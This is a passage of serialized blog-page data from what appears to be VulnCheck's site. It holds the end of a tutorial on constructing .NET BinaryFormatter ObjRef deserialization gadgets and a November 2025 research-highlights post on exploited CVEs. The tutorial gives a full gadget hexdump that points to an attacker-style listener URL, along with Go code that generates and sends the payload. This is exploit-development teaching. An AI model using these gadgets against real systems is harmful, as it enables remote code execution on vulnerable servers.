",[886,30815,30771],{},[14603,30817,30819],{"id":30818},"membernames","MemberNames",[18,30821,30822,30823,59],{},"Last in ClassInfo, is the array of MemberNames, which is a sequence of LengthPrefixedStrings. These define the member names for the class. Remember we should only expect to read N members from this where N == MemberCount. In this case, the only member name present should be \"ClassName\" with its length prefix in hex: ",[886,30824,30825],{},"\"\\x09\"",[18,30827,30828],{},"So that does it for ClassInfo, but remember that was just one component of the SystemClassWithMembersAndTypes; the next is the MemberTypeInfo, a data structure that exists to provide information ABOUT the members of the class.",[993,30830,30736],{"id":30831},"membertypeinfo",[18,30833,30834,30835,30838],{},"Do not be fooled by how few members are shown in ",[47,30836,30741],{"href":30734,"rel":30837},[51],". This component is probably the source of the most confusion when building these serialization objects by hand, primarily due to \"AdditionalInfos\".",[14603,30840,30842],{"id":30841},"binarytypeenums","BinaryTypeEnums",[18,30844,30845,30846,59],{},"First is BinaryTypeEnums. Per the docs, this is a sequence of single bytes that denote the data TYPE for each member of the class. The attribution of a given type to its corresponding member is derived from the POSITION of the individiual BinaryTypeEnum in the sequence relative to the sequence of class members. All possible BinaryTypeEnum values ",[47,30847,30850],{"href":30848,"rel":30849},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F054e5c58-be21-4c86-b1c3-f6d3ce17ec72",[51],"are located here",[18,30852,30853],{},"That was probably a bit unclear, so for example, if you have three members in a class, let's say they are someStringOne (String), someStringTwo (String), and someIntThree (Int).",[1354,30855,30858],{"className":30856,"code":30857,"language":1359},[1357],"\u002F\u002F note: this is pseudocode\nclass SomeClass {\n someStringOne string\n someStringTwo string\n someIntThree int\n}\n",[886,30859,30857],{"__ignoreMap":219},[18,30861,30862],{},"The MemberTypeInfo.BinaryTypeEnums section for that class should simply be: \"\\x01\\x01\\x00\".",[18,30864,30865,30866,30870],{},"This is because according to ",[47,30867,30869],{"href":30848,"rel":30868},[51],"the BinaryTypeEnum values documentation",", \"\\x01\" denotes a string of which there are two here. The int value, however, is not represented as its own enum value — this is where it gets a tad bit more confusing.",[18,30872,30873,30874,30879,30880,30883],{},"According to these docs, an int value is a primitive type and is therefore defined as a ",[47,30875,30878],{"href":30876,"rel":30877},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F4e77849f-89e3-49db-8fb9-e77ee4bc7214",[51],"PrimitiveTypeEnum"," value. So we mark its BinaryTypeEnum value as a \"\\x00\" (Primitive) so that when the stream is read it knows to look at the next section (AdditionalInfos) to determine the ",[1131,30881,30882],{},"actual"," type of this member.",[18,30885,30886],{},"So to recap, our hypothetical \"\\x01\\x01\\x00\" is described as a string (0x01), another string (0x01), and a primitive type (0x00) which we define as an int in the next section, AdditionalInfos.",[14603,30888,30890],{"id":30889},"additionalinfos","AdditionalInfos",[18,30892,30893],{},"This is a data structure that in some class-based records will not be used at all. It is ONLY present if and when one of the BinaryTypeEnums are either Primitive, SystemClass, Class, or PrimitiveArray. An easy way to remember it is to see if any of the BinaryTypeEnums have primitive or class in their names. If the binary type for a given member is anything OTHER than those four, an AdditionalInfos entry is NOT needed for that member. If NONE of the members' BinaryTypeEnums values are primitive or class based, then you can omit the AdditionalInfos component entirely.",[18,30895,30896],{},"Depending on if it is a Primitive, SystemClass, Class, or PrimitiveArray, a different type of value is expected in the AdditionalInfo data structure. Keep in mind also that the values within the AdditionalInfos data are position-correspondent, just like BinaryTypeEnum itself. This means that a given value within the AdditionalInfos section corresponds with the position of the BinaryTypeEnum requiring an AdditionalInfos value to be added.",[18,30898,30899,30900,30903,30904,30907,30908,30911,30912,30914],{},"To clarify further... if you had someStringOne, someIntTwo, someStringThree, and someIntFour, they would have a BinaryTypeEnum section of ",[886,30901,30902],{},"\"'\\x01\\x00\\x01\\x00\"",". Of those four BinaryTypeEnums, only TWO of them require an AdditionalInfos entry, so the entire AdditionalInfos section for those members would be ",[886,30905,30906],{},"\"\\x08\\x08\""," (0x08 denotes INT32). The first ",[886,30909,30910],{},"\"\\x08\""," would correspond to someIntTwo, and the second ",[886,30913,30910],{}," would correspond to someIntFour; the strings are ignored because they are not a Primitive, PrimitiveArray, SystemClass, or Class BinaryTypeEnum and thus do not need AdditionalInfos for them.",[18,30916,30917,30918,30921],{},"I hope that made sense, because now we will look at the AdditionalInfos section for the SystemClassWithMembersAndTypes from our ObjRef example which uses a slightly more complicated BinaryType to define which is the SystemClass as denoted by the ",[886,30919,30920],{},"\"\\x03\""," in the BinaryTypeEnums section. To aid the reader, this BinaryTypeEnum is located at offset 0x35 of the CyberChef dump.",[18,30923,30924,30925,30928],{},"If we look at the ",[47,30926,30736],{"href":30734,"rel":30927},[51]," documentation again, specifically at the AdditionalInfos section, we see the following sentence: \"For the BinaryTypeEnum value of SystemClass, this field specifies the name of the class (2)\". So that means slap a string in there, and of course it must be a LengthPrefixedString not just a string by itself.",[18,30930,30931,30932,30934,30935,30938,30939,30942,30943,30946],{},"So just to summarize, the BinaryTypeEnums section for this SystemClassWithMembersAndTypes's MemberTypeInfo section is ",[886,30933,30920],{},". Immediately following that, we start the AdditionalInfos if needed. Because the BinaryTypeEnums section contains a SystemClass BinaryTypeEnum, we DO need to provide an AdditionalInfos section, which in this case must be the name for the system class. Therefore, the AdditionalInfos section for this SystemClassWithMembersAndTypes's MemberTypeInfo section would be the prefix ",[886,30936,30937],{},"\"\\x1e\"",", followed immediately by ",[886,30940,30941],{},"\"System.Runtime.Remoting.ObjRef\"",". If there ",[1131,30944,30945],{},"were"," more Primitive or Class-based BinaryTypeEnum defined in the BinaryTypeEnums section of this MemberTypeInfo, then AdditionalInfos entries would immediately follow this LengthPrefixedString.",[14603,30948,30950],{"id":30949},"member-values","Member Values",[18,30952,30953],{},"Great, so we have exhausted all of the members for SystemClassWithMembersAndTypes which ends at offset 0x54. So what is all the stuff after it in the CyberChef hexdump output?",[18,30955,30956,30957,30960],{},"Well, we know that the ",[47,30958,30702],{"href":30700,"rel":30959},[51]," has ended because we made all of the sections per the defined specification. When a record ends in a serialization stream, the next byte is generally a new record; therefore the RecordTypeEnumeration documentation must be consulted. But something else that has not been revealed thus far and is not described well in the relevant Microsoft documentation: when a MemberTypeInfo ends, what generally follows immediately after is the VALUE for those defined members, one after another in a sequence.",[18,30962,30963,30964,30967,30968,30970,30971,30975],{},"Knowing that, we can assume that the next record is the VALUE for the members we just defined. According to the ",[47,30965,30581],{"href":30472,"rel":30966},[51]," documentation, the next byte, a ",[886,30969,30825],{}," (offset 0x55), is a ",[47,30972,13649],{"href":30973,"rel":30974},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Feef0aa32-ab03-4b6a-a506-bcdfc10583fd",[51]," record. If you remember above where I talked about ObjectIDs, this is where the primary record references those.",[18,30977,30978],{},"If you look at the documentation for the MemberReference.IdRef section, it says that the ObjectID can be for an object that comes after OR before the referencing record. If we said the ObjectID is like a memory address of an object, you can think of the MemberReference as a pointer to these objects — this way, if that object is referenced multiple times, you do not need to redefine the entire object record but can instead just provide a MemberReference record to an already defined object, which is only 5 bytes rather than the size of an entirely new object.",[1354,30980,30983],{"className":30981,"code":30982,"language":1359},[1357],"type MemberReferenceRecord struct {\n RecordTypeEnum int \u002F\u002F 1 BYTE, ALWAYS a 0x09\n IDRef int \u002F\u002F 4 BYTES - INT32 value containing the ObjectID that is being referenced\n}\n",[886,30984,30982],{"__ignoreMap":219},[18,30986,30987,30988,30990,30991,30994,30995,30998],{},"Given that the only previous object we defined (the \"System.Exception\" SystemClassWithMembersAndTypes) has an ObjectID of 1, we can assume the referenced object will come AFTER this record in the serialization stream. This assumption stands true, as the very next record ",[1131,30989,4563],{}," have an objectID of ",[886,30992,30993],{},"\"\\x02\""," and it should be familiar since it is another SystemClassWithMembersAndTypes. To clarify, the VALUE for the only member in the previously defined SystemClassWithMembersAndTypes ultimately points to ",[1131,30996,30997],{},"yet another"," SystemClassWithMembersAndTypes.",[993,31000,31002],{"id":31001},"systemclasswithmembersandtypes-2","SystemClassWithMembersAndTypes #2",[18,31004,31005],{},"Again, here is the full dump for easier reference:",[1354,31007,31010],{"className":31008,"code":31009,"language":1359},[1357],"00000000 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 |.....ÿÿÿÿ.......|\n00000010 00 04 01 00 00 00 10 53 79 73 74 65 6d 2e 45 78 |.......System.Ex|\n00000020 63 65 70 74 69 6f 6e 01 00 00 00 09 43 6c 61 73 |ception.....Clas|\n00000030 73 4e 61 6d 65 03 1e 53 79 73 74 65 6d 2e 52 75 |sName..System.Ru|\n00000040 6e 74 69 6d 65 2e 52 65 6d 6f 74 69 6e 67 2e 4f |ntime.Remoting.O|\n00000050 62 6a 52 65 66 09 02 00 00 00 04 02 00 00 00 1e |bjRef...........|\n00000060 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 52 |System.Runtime.R|\n00000070 65 6d 6f 74 69 6e 67 2e 4f 62 6a 52 65 66 01 00 |emoting.ObjRef..|\n00000080 00 00 03 75 72 6c 01 06 03 00 00 00 20 68 74 74 |...url...... htt|\n00000090 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 35 31 2e 31 |p:\u002F\u002F192.168.51.1|\n000000a0 35 3a 38 38 38 38 2f 68 63 51 61 41 54 0b |5:8888\u002FhcQaAT.|\n",[886,31011,31009],{"__ignoreMap":219},[18,31013,31014],{},"Our new record begins at hex 0x5A.",[18,31016,31017,31018,31020],{},"I will not rehash everything since we have already defined a very similar record, but I ",[1131,31019,13641],{}," define the values in case there is confusion. You could also stop here and try and make it yourself if that sounds like fun to you.",[22,31022,31023,31029,31036,31045,31050,31060,31067],{},[25,31024,31025,31026],{},"SystemClassWithMembersAndTypes.RecordTypeEnum = 4 ",[886,31027,31028],{},"\"\\x04\"",[25,31030,31031,31032,31035],{},"SystemClassWithMembersAndTypes.ClassInfo.ObjectID = 2 ",[886,31033,31034],{},"\"\\x02\\x00\\x00\\x00\"",", This should look familiar from the immediately preceding MemberReference record.",[25,31037,31038,31039,13858,31042,31044],{},"SystemClassWithMembersAndTypes.ClassInfo.Name = lenPrefix ",[886,31040,31041],{},"\\x1e",[886,31043,30941],{},", Should also familiar from the AdditionalInfos section of Object 1.",[25,31046,31047,31048],{},"SystemClassWithMembersAndTypes.ClassInfo.MemberCount = 1 ",[886,31049,30771],{},[25,31051,31052,31053,31056,31057],{},"SystemClassWithMembersAndTypes.ClassInfo.MemberNames = lenPrefix ",[886,31054,31055],{},"\\x03"," followed by the string: ",[886,31058,31059],{},"\"url\"",[25,31061,31062,31063,31066],{},"SystemClassWithMembersAndTypes.MemberTypeInfo.BinaryTypeEnums = ",[886,31064,31065],{},"\"\\x01\"",". States that the only member for this class if of type: string.",[25,31068,31069],{},"SystemClassWithMembersAndTypes.MemberTypeInfo.AdditionalInfo = \"\", nothing for this as we do not need it; none of the BinaryTypeEnums are Classes or Primitives based, all we have is a string.",[18,31071,31072,31073,31076],{},"Those are all of the values for all of the components of ",[1131,31074,31075],{},"that"," object, but as we know, we defined one member; therefore, we must provide one member value immediately following the SystemClassWithMembersAndTypes, and because this a serialization stream, we cannot simply have random values floating around in the stream. All things must be defined in a RECORD since once again, a serialization stream is a sequence of records.",[18,31078,31079,31080,31082,31083,31088],{},"With all of that said, the member type that we defined is of BinaryTypeEnum ",[886,31081,31065],{},", which is a string. So how do we represent a string as a record? Using the next record in the dump, a ",[47,31084,31087],{"href":31085,"rel":31086},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Feb503ca5-e1f6-4271-a7ee-c4ca38d07996",[51],"BinaryObjectString",", defined below.",[993,31090,31087],{"id":31091},"binaryobjectstring",[1354,31093,31096],{"className":31094,"code":31095,"language":1359},[1357],"type BinaryObjectString struct {\n RecordTypeEnum int \u002F\u002F 1 BYTE - ALWAYS 0x06\n ObjectID int \u002F\u002F 4 BYTES - INT32. This is a record, therefore it needs an ObjectID in case it needs to be referenced\n Value string \u002F\u002F This needs to be a LengthPrefixedString. This contains the value for the string.\n}\n",[886,31097,31095],{"__ignoreMap":219},[18,31099,31100],{},"So immediately following that SystemClassWithMembersAndTypes (Object 2), we define the next object in the stream as such:",[22,31102,31103,31106,31112],{},[25,31104,31105],{},"BinaryObjectString.RecordTypeEnum = 0x06",[25,31107,31108,31109],{},"BinaryObjectString.ObjectID = ",[886,31110,31111],{},"\"\\x03\\x00\\x00\\x00\"",[25,31113,31114,31115,31118,31119],{},"BinaryObjectString.Value = lenPrefix ",[886,31116,31117],{},"\"\\x20\""," followed by ",[886,31120,31121],{},"\"http:\u002F\u002F192.168.51.15:8888\u002FhcQaAT\"",[18,31123,31124,31125,31130,31131,31134],{},"Then we end the entire serialization stream using the ",[47,31126,31129],{"href":31127,"rel":31128},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Fde6a574b-c596-4d83-9df7-63c0077acd32",[51],"MessageEnd Record",". This is the simplest record of all, it is just a ",[886,31132,31133],{},"\\x0B"," that denotes the end of the stream.",[993,31136,31138],{"id":31137},"gadget-complete","Gadget Complete",[18,31140,31141,31142,31145],{},"With all of the structs defined, and the process for understading them under wraps, all that is left is to define a method similar to the ",[886,31143,31144],{},"ToRecordBin()"," shown in the earlier example for each of the discussed records and then concatenate those results in the same order as the dump. This is left as an exercise for the reader.",[61,31147,31149],{"id":31148},"using-the-new-go-exploit-deserialization-library","Using the new Go-Exploit deserialization library",[18,31151,31152,31153,31156],{},"You could also use our ",[47,31154,20558],{"href":30688,"rel":31155},[51]," library as a reference or for gadget generation. Also, do note that this was a rather small serialization stream example; there are much more complicated gadgets, some of which contain serialization streams as values inside of other serialization stream records. Even so, construction of those should all follow the same basic principles explained in this article.",[993,31158,31160],{"id":31159},"usage","Usage",[18,31162,31163],{},"Using VulnCheck's go-exploit library to generate the ObjRef payload is as simple as:",[1354,31165,31168],{"className":31166,"code":31167,"language":1359},[1357],"package main\nimport (\n \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fdotnet\"\n)\nfunc main() {\n payload := dotnet.CreateObjectRef(\"something\", dotnet.BinaryFormatter) \u002F\u002F gadget generated!\n sendPayload(payload)\n}\n",[886,31169,31167],{"__ignoreMap":219},[61,31171,31173],{"id":31172},"more-to-come","More to Come",[18,31175,31176,31177,31181],{},"go-exploit provides a simple and efficient way to develop sophisticated and portable exploits. If you are interested in contributing to go-exploit or have feedback on your own experience developing exploits, we would love to hear from you! Visit ",[47,31178,31180],{"href":14297,"rel":31179},[51],"go-exploit on GitHub"," to get involved.",[61,31183,202],{"id":201},[1308,31185],{},[18,31187,1228,31188,1234,31191,1240,31194,1246,31197,1255,31200,1260],{},[47,31189,1233],{"href":10806,"rel":31190},[51],[47,31192,1239],{"href":1237,"rel":31193},[51],[47,31195,1245],{"href":1243,"rel":31196},[51],[47,31198,1251],{"href":1249,"rel":31199},[51],[47,31201,216],{"href":1258,"rel":31202},[51],[18,31204,31205],{},"EOF",{"title":219,"searchDepth":220,"depth":220,"links":31207},[31208,31209,31210,31211,31219,31222,31223],{"id":30400,"depth":220,"text":30401},{"id":13191,"depth":220,"text":13194},{"id":30438,"depth":220,"text":30439},{"id":30462,"depth":220,"text":30463,"children":31212},[31213,31214,31215,31216,31217,31218],{"id":30484,"depth":1266,"text":30485},{"id":30693,"depth":1266,"text":30694},{"id":30831,"depth":1266,"text":30736},{"id":31001,"depth":1266,"text":31002},{"id":31091,"depth":1266,"text":31087},{"id":31137,"depth":1266,"text":31138},{"id":31148,"depth":220,"text":31149,"children":31220},[31221],{"id":31159,"depth":1266,"text":31160},{"id":31172,"depth":220,"text":31173},{"id":201,"depth":220,"text":202},"2025-11-12","Creating a language-native .NET source for deserialization gadgets",{"slug":31227},"making-dotnet-gadgets","\u002Fblog\u002Fmaking-dotnet-gadgets",{"title":30393,"description":31225},"blog\u002Fmaking-dotnet-gadgets",[1281,14365,14366],"zWEmgIrOMVxfJBOr6cNL0sAssRGbXNkl0U4O4fuKbGk",{"id":31234,"title":29960,"articles":7,"authors":31235,"body":31237,"date":31566,"description":31567,"extension":234,"image":7,"link":7,"meta":31568,"navigation":237,"path":31570,"seo":31571,"series":7,"stem":31572,"subtype":7,"tags":31573,"__hash__":31574},"blog\u002Fblog\u002Fnovember-2025-research-highlights.md",[31236],{"name":256,"link":258,"avatar":257,"linkName":29813},{"type":15,"value":31238,"toc":31558},[31239,31245,31249,31289,31292,31318,31322,31335,31342,31353,31362,31366,31379,31385,31402,31413,31416,31450,31454,31461,31467,31470,31484,31487,31513,31523,31525,31541],[18,31240,31241,31242,59],{},"Welcome to another edition of VulnCheck’s monthly research highlights. This past month saw in-the-wild exploitation of plenty of new vulnerabilities, including several that alarmed global incident response teams. A good chunk of new Known Exploited Vulnerabilities (KEVs) come from VulnCheck Canaries, which are live, vulnerable production systems that identify real-world exploitation firsthand. Finally, VulnCheck’s CNA team hit a major milestone that has long-term benefits for the security community. Want more? Read VulnCheck’s October Research Highlights ",[47,31243,305],{"href":30351,"rel":31244},[51],[61,31246,31248],{"id":31247},"latest-emerging-threats","Latest Emerging Threats",[18,31250,31251,31252,31257,31258,31263,31264,31268,31269,11496,31273,10515,31278,10515,31283,31288],{},"The top story among late October emerging threats is likely ",[47,31253,31256],{"href":31254,"rel":31255},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-59287",[51],"CVE-2025-59287",", a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS) arising from a deserialization of untrusted data issue. The vulnerability was patched in an ",[47,31259,31262],{"href":31260,"rel":31261},"https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Ftopic\u002Foctober-23-2025-kb5070883-os-build-17763-7922-out-of-band-860bc03c-52fb-407c-89b2-14ecf4893c5c",[51],"out-of-band update"," on October 23 after its original Patch Tuesday fix was, apparently, incomplete. Proof-of-concept exploit code has been ",[47,31265,25096],{"href":31266,"rel":31267},"https:\u002F\u002Fhawktrace.com\u002Fblog\u002FCVE-2025-59287",[51]," since October 17, and a variety of ",[47,31270,11495],{"href":31271,"rel":31272},"https:\u002F\u002Fnews.sophos.com\u002Fen-us\u002F2025\u002F10\u002F29\u002Fwindows-server-update-services-wsus-vulnerability-abused-to-harvest-sensitive-data\u002F",[51],[47,31274,31277],{"href":31275,"rel":31276},"https:\u002F\u002Fadvisories.ncsc.nl\u002F2025\u002Fncsc-2025-0310.html",[51],"reported",[47,31279,31282],{"href":31280,"rel":31281},"https:\u002F\u002Fwww.darktrace.com\u002Fblog\u002Fwsus-exploited-darktraces-analysis-of-post-exploitation-activities-related-to-cve-2025-59287",[51],"ongoing",[47,31284,31287],{"href":31285,"rel":31286},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fexploitation-of-windows-server-update-services-remote-code-execution-vulnerability",[51],"exploitation"," in the wild. VulnCheck researchers spotted between 2,500 and 6,000 WSUS servers exposed to the public internet.",[18,31290,31291],{},"Other vulnerabilities VulnCheck’s research team is watching include:",[22,31293,31294,31302,31310],{},[25,31295,31296,31301],{},[47,31297,31300],{"href":31298,"rel":31299},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-11371",[51],"CVE-2025-11371",": Gladinet CentreStack and TrioFox unauthenticated local file inclusion, exploited since October 9",[25,31303,31304,31309],{},[47,31305,31308],{"href":31306,"rel":31307},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-54236",[51],"CVE-2025-54236",": Adobe Commerce and Magento improper input validation, exploited since October 21",[25,31311,31312,31317],{},[47,31313,31316],{"href":31314,"rel":31315},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-49844",[51],"CVE-2025-49844",": Redis use-after-free, PoC available; our research team assesses this vulnerability is unlikely to be used at scale, but exploit code availability increases the chances of seeing exploit attempts in the wild",[61,31319,31321],{"id":31320},"new-vulncheck-kevs","New VulnCheck KEVs",[18,31323,31324,31325,31328,31329,31334],{},"The VulnCheck team added ",[295,31326,31327],{},"95"," new vulnerabilities to VulnCheck KEV in October 2025, the vast majority of which (80 CVEs) were not yet on CISA KEV as the month ended. CISA added 31 CVEs to CISA KEV in October, 21 of which had been previously incorporated into VulnCheck KEV (e.g., Adobe Experience Manager ",[47,31330,31333],{"href":31331,"rel":31332},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-54253",[51],"CVE-2025-54253",", which was added to VulnCheck KEV in August).",[18,31336,31337],{},[68,31338],{"alt":31339,"src":31340,"style":31341},"Earliest exploitation in the wild reports","blog\u002Fnovember-research-highlights\u002Fearliest-reporters-of-exploitation-in-the-wild-october-2025.png","width: 65%; height: auto; margin-left: auto; margin-right: auto;",[18,31343,31344,31345,31348,31349,59],{},"Following the mid-October rollout of VulnCheck Canaries, canary-observed exploit activity resulted in 25 new VulnCheck KEVs, 22 of which had no prior publicly reported exploitation evidence. As of November 3, VulnCheck ",[47,31346,283],{"href":920,"rel":31347},[51]," includes in-the-wild detections of more than 220 CVEs, just over half of which (113) are on CISA KEV. More than 40 of the CVEs observed in the wild are known to be exploited by ransomware groups. Read more ",[47,31350,31352],{"href":29746,"rel":31351},[51],"Canary stats here",[18,31354,31355,10515,31358,31361],{},[295,31356,31357],{},"Want alerts about known exploited vulnerabilities earlier in the exploit lifecycle?",[47,31359,1233],{"href":1231,"rel":31360},[51]," is free!",[993,31363,31365],{"id":31364},"vulncheck-observed-canary-exploitation","VulnCheck-Observed Canary Exploitation",[18,31367,31368,31369,31374,31375,31378],{},"In February 2025, VulnCheck’s Initial Access Intelligence team shipped an exploit for a code injection flaw in XWiki, an open-source alternative to enterprise knowledge-sharing platforms like Atlassian Confluence. At the time, ",[47,31370,31373],{"href":31371,"rel":31372},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-02-28#cve-2025-24893-xwiki-solr-search-code-injection",[51],"the team wrote"," about ",[47,31376,30050],{"href":30048,"rel":31377},[51],": “We expect this to be exploited in the wild in the future due to ease of exploitation and number of targets online.”",[18,31380,31381],{},[68,31382],{"alt":31383,"src":31384},"VulnCheck exploited vulnerability timeline CVE-2025-24893","blog\u002Fnovember-research-highlights\u002Fvuln-check-timeline-cve-2025-24893.png",[18,31386,31387,31388,31392,31393,31397,31398,59],{},"As expected, CVE-2025-24893 was added to VulnCheck KEV in Q1 of this year, and that was that — or not, as it turns out. A few weeks ago, VulnCheck Canaries began detecting a two-stage attack originating from Vietnam that dropped a coinminer on victim systems. FOFA still ",[47,31389,14466],{"href":31390,"rel":31391},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iZGF0YS14d2lraS0i",[51]," more than 6,000 XWiki installations on the public internet. CVE-2025-24893 was added to CISA KEV on October 30, 2025. Read ",[47,31394,31396],{"href":19426,"rel":31395},[51],"more about XWiki exploitation",", including payload analysis and IOCs, from VulnCheck CTO ",[47,31399,10391],{"href":31400,"rel":31401},"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fjacob-baines-1490a7189\u002F",[51],[18,31403,31404,31405,31408,31409,59],{},"VulnCheck Canaries also unearthed exploitation of another notable issue in October: An unauthenticated command injection vulnerability in call center software ICTBroadcast, tracked as ",[47,31406,23717],{"href":23715,"rel":31407},[51],". The vulnerability, which had no prior evidence of exploitation in the wild, was leveraged in a two-phase attack that attempted to establish a reverse shell on victim systems. VulnCheck Canaries are still detecting regular exploit attempts for CVE-2025-2611, which at time of writing is not yet on CISA KEV. Details and IOCs ",[47,31410,31412],{"href":24024,"rel":31411},[51],"are here",[18,31414,31415],{},"Other notable CVEs VulnCheck Canaries have observed in the wild since mid-October:",[22,31417,31418,31426,31434,31442],{},[25,31419,31420,31425],{},[47,31421,31424],{"href":31422,"rel":31423},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-6235",[51],"CVE-2024-6235",": Citrix NetScaler Console sensitive information disclosure",[25,31427,31428,31433],{},[47,31429,31432],{"href":31430,"rel":31431},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-34124",[51],"CVE-2023-34124",": SonicWall GMS and Analytics Web Services authentication bypass",[25,31435,31436,31441],{},[47,31437,31440],{"href":31438,"rel":31439},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-23917",[51],"CVE-2024-23917",": JetBrains TeamCity authentication bypass",[25,31443,31444,31449],{},[47,31445,31448],{"href":31446,"rel":31447},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-20419",[51],"CVE-2024-20419",": Cisco Smart Software Manager unverified password change",[61,31451,31453],{"id":31452},"vulncheck-cna-cves-for-the-cve-gods","VulnCheck CNA: CVEs for the CVE Gods",[18,31455,31456,31457,31460],{},"As a high-volume research CNA (CVE Numbering Authority), VulnCheck assigned ",[295,31458,31459],{},"162"," new CVEs in October for vulnerabilities lacking CVE identifiers, including 13 vulnerabilities with exploitation evidence.",[18,31462,31463],{},[68,31464],{"alt":31465,"src":31466,"style":31341},"VulnCheck CNA activity October 2025","blog\u002Fnovember-research-highlights\u002Fvuln-check-cna-activity-november-2025.png",[18,31468,31469],{},"VulnCheck CNA assigns CVEs for vulnerabilities discovered across a variety of audit and exploit research projects. October’s breakdown:",[22,31471,31472,31475,31478,31481],{},[25,31473,31474],{},"Nagios vulnerability audit: 97 CVEs",[25,31476,31477],{},"Reported to VulnCheck by security researchers: 42 CVEs",[25,31479,31480],{},"Detected by VulnCheck Canaries: 10 CVEs",[25,31482,31483],{},"Other exploitation research: 13 CVEs",[18,31485,31486],{},"VulnCheck has roughly a dozen coordinated vulnerability disclosure (CVD) projects in flight at any given time for vulnerabilities reported to us by third-party researchers. Our team has disclosed a number of neat finds from the research community over the past month, including:",[22,31488,31489,31497,31505],{},[25,31490,31491,31492],{},"8 mixed severity issues, including several critical vulnerabilities, in Ilevia EVE X1 Server 4.7.18.0.eden discovered by Gjoko Krstic of ",[47,31493,31496],{"href":31494,"rel":31495},"https:\u002F\u002Fwww.zeroscience.mk\u002Fen\u002Fvulnerabilities\u002F",[51],"Zero Science Lab",[25,31498,31499,31500,2230],{},"18 separate high- and medium-severity issues in IPFire \u003C 2.29 discovered by Alex Williams of Pellera Technologies (e.g., ",[47,31501,31504],{"href":31502,"rel":31503},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Fipfire-command-injection-via-proxy-report-creation",[51],"CVE-2025-34311",[25,31506,31507,31512],{},[47,31508,31511],{"href":31509,"rel":31510},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Fopenplc-runtime-v3-persistent-denial-of-service",[51],"CVE-2025-34226",": OpenPLC Runtime input validation vulnerability leading to persistent DoS discovered by Eyodav (Mike G.A.)",[18,31514,31515,10515,31518,31522],{},[295,31516,31517],{},"Have a vulnerability you’re looking to disclose?",[47,31519,31521],{"href":2999,"rel":31520},[51],"Report it to VulnCheck"," and we’ll handle disclosure coordination and CVE assignment on your behalf!",[61,31524,202],{"id":201},[18,31526,31527,31528,1246,31533,1255,31536,59],{},"The VulnCheck research team is always on the lookout for new attack vectors and fresh vulnerability intelligence. For more research like this, see ",[47,31529,31532],{"href":31530,"rel":31531},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fstate-of-exploitation-1h-2025",[51],"State of Exploitation: A Look Into 1H 2025 Vulnerability Exploitation and Threat Activity",[47,31534,30353],{"href":30351,"rel":31535},[51],[47,31537,31540],{"href":31538,"rel":31539},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fstillup-stillevil",[51],"Still Up, Still Evil: A Look at Attacker Infrastructure Longevity",[18,31542,1228,31543,1234,31546,1240,31549,1246,31552,1255,31555,1260],{},[47,31544,1233],{"href":10806,"rel":31545},[51],[47,31547,1239],{"href":1237,"rel":31548},[51],[47,31550,1245],{"href":1243,"rel":31551},[51],[47,31553,1251],{"href":1249,"rel":31554},[51],[47,31556,216],{"href":1258,"rel":31557},[51],{"title":219,"searchDepth":220,"depth":220,"links":31559},[31560,31561,31564,31565],{"id":31247,"depth":220,"text":31248},{"id":31320,"depth":220,"text":31321,"children":31562},[31563],{"id":31364,"depth":1266,"text":31365},{"id":31452,"depth":220,"text":31453},{"id":201,"depth":220,"text":202},"2025-11-05","Insights on emerging threats, VulnCheck-observed exploitation in the wild, and published CVEs from VulnCheck’s research teams",{"slug":31569},"november-2025-research-highlights","\u002Fblog\u002Fnovember-2025-research-highlights",{"title":29960,"description":31567},"blog\u002Fnovember-2025-research-highlights",[242,1281,1279,1280],"gQT2on65KKCIRw9CkFWniy5L4O-qY5OB9piPUK3PJEc",{"id":31576,"title":19428,"articles":31577,"authors":31618,"body":31620,"date":31581,"description":32046,"extension":234,"image":7,"link":7,"meta":32047,"navigation":237,"path":32049,"seo":32050,"series":7,"stem":32051,"subtype":7,"tags":32052,"__hash__":32053},"blog\u002Fblog\u002Fxwiki-cve-2025-24893-eitw.md",[31578,31582,31585,31589,31592,31595,31598,31601,31604,31608,31612,31615],{"title":31579,"source":14386,"link":31580,"date":31581},"XWiki RCE Vulnerability Actively Exploted In Wild To Deliver Coinminer","https:\u002F\u002Fcybersecuritynews.com\u002Fxwiki-rce-vulnerability\u002F#google_vignette","2025-10-28",{"title":31583,"source":12157,"link":31584,"date":31581},"Risky Bulletin: HackingTeam successor linked to recent Chrome 